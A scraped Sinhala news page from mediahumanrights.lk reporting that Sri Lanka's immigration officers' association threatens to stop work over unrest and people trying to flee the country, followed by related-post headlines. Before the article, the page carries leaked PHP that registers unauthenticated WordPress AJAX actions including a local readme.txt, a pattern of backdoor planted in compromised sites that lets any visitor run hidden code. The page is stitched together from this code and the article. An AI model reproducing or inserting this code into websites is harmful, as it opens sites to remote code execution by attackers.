if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } පිරිසක් රටින් පනින්න හදනවා.. අපි සේවයෙන් ඉවත් වෙනවා..- ආගමන විගමන නිලධාරීන් - mediahumanrights.lk
mediahumanrights.lk
Local News News

පිරිසක් රටින් පනින්න හදනවා.. අපි සේවයෙන් ඉවත් වෙනවා..- ආගමන විගමන නිලධාරීන්

ඇතැම් පිරිස් රටින් පලා යාම පිළිබඳ සංවාදයක් පැනනැඟී ඇති තත්ත්වය තුළ තම රාජකාරියට දැඩි බලපෑමක් එල්ල වී ඇතැයි ආගමන හා විගමන නිළධාරීන්ගේ සංගමය සඳහන් කරයි.

ඒ හේතුවෙන් රට පත්ව ඇති අරාජික හා නොසන්සුන්කාරී තත්ත්වයට විසඳුම් ලබා නොදුන හොත් වහා ක්‍රියාත්මක වන පරිදි රාජකාරිවලින් බැහැර වන බව ශ්‍රී ලංකා ආගමන හා විගමන නිළධාරීන්ගේ සංගමය කියා සිටී.

Related posts

රට පුරා පාසල්වල ඉංග්‍රීසි දැනුම දැඩි කරන්න අලුත් වැඩක්

Shiran Viraj

සදුදා සිට රට පුරාම තෙල් නෑ.. අද එන්නේ ඊයේ ඔ්ඩර් කල තෙල්.. නව ඇණැවුම් නෑ.. – ෂෙඩ් සභාපති…

Shiran Viraj

මම කිව්ව දේ ඇහුවා නම් මහින්ද තාම ජනාධිපති

Shiran Viraj